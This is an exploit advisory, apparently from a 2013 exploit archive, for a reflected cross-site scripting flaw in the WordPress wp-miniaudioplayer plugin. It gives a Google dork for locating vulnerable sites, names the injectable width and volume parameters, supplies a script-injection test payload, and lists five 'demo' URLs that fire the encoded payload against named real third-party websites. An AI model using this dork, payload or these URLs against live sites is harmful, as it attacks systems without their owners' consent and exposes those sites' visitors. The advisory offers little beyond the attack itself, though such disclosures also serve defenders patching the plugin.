WordPress Miniaudioplayer plugin suffers from a cross-site scripting vulnerability. Note that this advisory contains site-specific information.
dd8134a154849569a93f038bae0d108d64c84c09b21dab4477b068a0348be4f1
#######################################################################
# Exploit Title : WordPress wp-miniaudioplayer Cross-Site Scripting Vulnerability
#
# Exploit Author : Ashiyane Digital Security Team
#
# Google Dork : inurl:/wp-content/plugins/wp-miniaudioplayer
#
# Date: 2013/09/24
#
# Affected Versions : all versions
#
# Vendor Homepage : http://wordpress.org
#
# Software link :
http://downloads.wordpress.org/plugin/wp-miniaudioplayer.1.3.8.zip
#
# Tested on: Windows
#
##############
#
# Location:
site/wp-content/plugins/wp-miniaudioplayer/maptinymce/maplayertinymce.php?url=&audiotitle=&skin=black&width=[xss]&volume=[xss]#
#
# Method : GET
#
# Script for Test : "/><script>alert(1);</script>
#
##############
##############
# Demo:
#
#
http://www.alisonstewart.net/wp-content//plugins/wp-miniaudioplayer/maptinymce/maplayertinymce.php?url=&audiotitle=&skin=black&width=%22%2F%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&volume=%22%2F%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E#
#
#
http://www.adogforsaul.org/wp-content/plugins/wp-miniaudioplayer/maptinymce/maplayertinymce.php?url=&audiotitle=&skin=black&width=%22%2F%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&volume=%22%2F%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E#
#
#
http://www.blondandblondandblond.com/wp-content/plugins/wp-miniaudioplayer/maptinymce/maplayertinymce.php?url=&audiotitle=&skin=black&width=%22%2F%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&volume=%22%2F%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E#
#
#
http://www.navafilm.com/wp-content/plugins/wp-miniaudioplayer/maptinymce/maplayertinymce.php?url=&audiotitle=&skin=black&width=%22%2F%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&volume=%22%2F%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E#
#
#
http://www.riverlifechurch.tv/wp-content/plugins/wp-miniaudioplayer/maptinymce/maplayertinymce.php?url=&audiotitle=&skin=black&width=%22%2F%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&volume=%22%2F%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E#
#
##############
#
# Discovered By : ACC3SS
#
##############